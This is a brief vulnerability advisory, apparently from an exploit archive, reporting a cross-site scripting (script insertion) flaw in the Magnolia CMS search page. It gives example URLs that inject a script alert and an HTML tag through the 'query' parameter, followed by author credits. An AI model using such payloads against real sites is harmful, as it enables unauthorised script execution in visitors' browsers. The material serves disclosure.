# Magnolia CMS Script Insertion Vulnerability
#
# Risk: Medium
# Class: Remote
# Script: Magnolia CMS
# Version: not define

-------------------------------------------------------------------
Example:

http://[target]/[path]/search.html?query=[CODE]&x=0&y=0

http://[target]/[path]/search.html?query=<script>alert("lol");</script>&x=0&y=0
http://[target]/[path]/search.html?query=<body bgcolor="red">&x=0&y=0

-------------------------------------------------------------------

Credit
Author: Kiki
Site: http://kiki91.altervista.org
IRC Channel: irc.azzurra.org 6667 #system